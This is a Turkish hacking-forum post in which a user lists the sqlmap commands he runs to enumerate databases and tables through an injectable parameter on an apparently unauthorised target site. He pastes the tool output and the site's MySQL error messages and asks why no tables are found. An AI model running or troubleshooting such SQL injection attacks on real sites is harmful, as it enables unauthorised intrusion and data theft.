Sqlmap yardım

gkbrkttr

Üye
25 Haz 2015
224
0
Beyler kali linuxte sqlmap sorunu yaşıyorum yaptıklarımı adım adım söylüyorum hatam varsa siz söylersiniz.

1=>Terminali açıp "sqlmap -u www.hedefsite.com/detail.php?idOuv=2344 --dbs" yazıp enter a basıyorum yaklaşık 2-3 dakika sonra tarama bitiyor ve 1 tane database buldu oda şu
Kod:
available databases [1]:
[*] 404856_pur
2=>tekrar "sqlmap -u www.hedefsite.com/detail.php?idOuv=2344 -D 404856_pur --tables" yazıp enter a basıyorum ardından şöyle bir soru geliyor
Kod:
o you want to use common table existence check? [y/N/q]
"Y" Diyorum.
3=>ardından başka bir soru geliyor
Kod:
please enter number of threads? [Enter for 1 (current)]
1 yazıp enterlayınca 5dk bekletiyor.
4=>sonuç
Kod:
[23:47:18] [WARNING] no table(s) found
No tables found
[23:47:18] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 19 times
Not=sitede sql açığı olduğundan eminim hatta verdiği sql hatasınıda yazim
Kod:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /htdocs/public/www/detail.php on line 25

Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in /htdocs/public/www/detail.php on line 26

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /htdocs/public/www/detail.php on line 27

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /htdocs/public/www/detail.php on line 32

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /htdocs/public/www/detail.php on line 33

ACABA SORUN NEREDE ?

YARDIMCI OLURSANIZ ÇOK MEMNUN OLURUM.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.